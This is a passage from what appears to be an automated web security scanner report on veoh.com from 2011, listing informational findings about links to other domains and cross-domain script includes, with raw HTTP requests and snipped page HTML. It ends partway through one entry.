               <a title="Twitter" href="http://www.twitter.com/veoh" target="_blank" onclick="trackClickInGA('/homepage/twitter');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-twitter.png" />
...[SNIP]...
<li id="nav-facebook">
               <a title="Facebook" href="http://www.facebook.com/pages/Veoh/129836657035793" target="_blank" onclick="trackClickInGA('/homepage/facebook');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-facebook.png" />
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768465"></script>
...[SNIP]...
</span>
       <a class="button sp_button-blue" href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"><span>
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Action-Anime">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.2c603d6edb9e44339cf5a82943ef8b04.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Horror-Movies">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.9d76b62635aa43948f525b2cc46e8958.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/MitchRider">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.1e075a3674f74e27a7cb4808ae42d91f.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
</a>
           <a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8" target="_blank" class="icon sp_facebook" title="Share on Facebook"></a>
           <a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&t=Magadheera+SmartDesis.TK.mp4&c=action" class="icon sp_myspace" target="_blank" title="Share on MySpace"></a>
           <a href="http://twitter.com/home?status=Watch: http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8" class="icon sp_twitter" target="_blank" title="Share on Twitter"></a>
...[SNIP]...
<div id="moreShareIcons" class="hide">
               <a href="http://digg.com/submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&bodytext=action&media=video&topic=movies" target="_blank" title="Digg This" class="icon sp_digg"></a>
               <a href="http://delicious.com/save?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&notes=action" target="_blank" title="Save a Bookmark on Delicious" class="icon sp_delicious"></a>
               <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4" target="_blank" title="Stumble it" class="icon sp_stumbleupon"></a>
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Action-Anime">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.2c603d6edb9e44339cf5a82943ef8b04.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Horror-Movies">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.9d76b62635aa43948f525b2cc46e8958.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/MitchRider">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.1e075a3674f74e27a7cb4808ae42d91f.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Upcoming-Movies">
<img src="http://static.qlipso.com/share/Resources/0/5/193/RoomThumb.5193736.2c5c689b2f5f45368a9547702fc35410.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<li><a id="footer-twitter" href="http://www.twitter.com/veoh" title="Twitter">Twitter</a>
...[SNIP]...
<li><a href="http://veoh.tv/ccjjew">Feedback</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript>
       <a href="http://www.quantcast.com/p-aasG6JkxVvmNA" target="_blank">
           <img src="http://pixel.quantserve.com/pixel/p-aasG6JkxVvmNA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
       </a>
...[SNIP]...

7.3. http://www.veoh.com/publish/video  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /publish/video

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /publish/video?source=navbar HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:40 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 25294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<li id="nav-twitter">
               <a title="Twitter" href="http://www.twitter.com/veoh" target="_blank" onclick="trackClickInGA('/homepage/twitter');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-twitter.png" />
...[SNIP]...
<li id="nav-facebook">
               <a title="Facebook" href="http://www.facebook.com/pages/Veoh/129836657035793" target="_blank" onclick="trackClickInGA('/homepage/facebook');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-facebook.png" />
...[SNIP]...
<li><a id="footer-twitter" href="http://www.twitter.com/veoh" title="Twitter">Twitter</a>
...[SNIP]...
<li><a href="http://veoh.tv/ccjjew">Feedback</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
<noscript>
       <a href="http://www.quantcast.com/p-aasG6JkxVvmNA" target="_blank">
           <img src="http://pixel.quantserve.com/pixel/p-aasG6JkxVvmNA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
       </a>
...[SNIP]...

8. Cross-domain script include  previous  next
There are 76 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


8.1. http://www.veoh.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=74
Content-Length: 50459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.2. http://www.veoh.com/browse/groups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/groups

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/groups HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=28
Content-Length: 71827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769071"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.3. http://www.veoh.com/browse/groups/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/groups/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/groups/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=66
Content-Length: 71825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769489"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.4. http://www.veoh.com/browse/movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/movies

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:33:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=83
Content-Length: 104211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768839"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.5. http://www.veoh.com/browse/movies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/movies/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/movies/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:42:20 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=83
Content-Length: 104211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769340"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.6. http://www.veoh.com/browse/music  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/music

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/music HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=12
Content-Length: 69925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768959"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.7. http://www.veoh.com/browse/music/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/music/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/music/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 69925

